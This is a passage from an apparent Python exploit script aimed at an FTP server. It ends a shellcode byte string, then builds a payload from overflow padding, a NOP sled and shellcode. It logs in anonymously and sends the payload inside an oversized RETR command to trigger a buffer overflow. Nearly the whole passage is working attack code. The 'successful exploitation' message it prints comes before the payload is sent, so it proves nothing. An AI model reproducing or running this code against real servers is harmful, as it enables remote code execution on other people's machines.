"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
remotecode = overflow + nop + shellcode + '\r\n'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((ip ,port))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASSW hacker@hacker.net\r\n')
s.recv(1024)
print remotecode
print '''
Successfull Exploitation!
'''
message = 'RETR ' + remotecode
s.send(message)
s.recv(1024)
s.close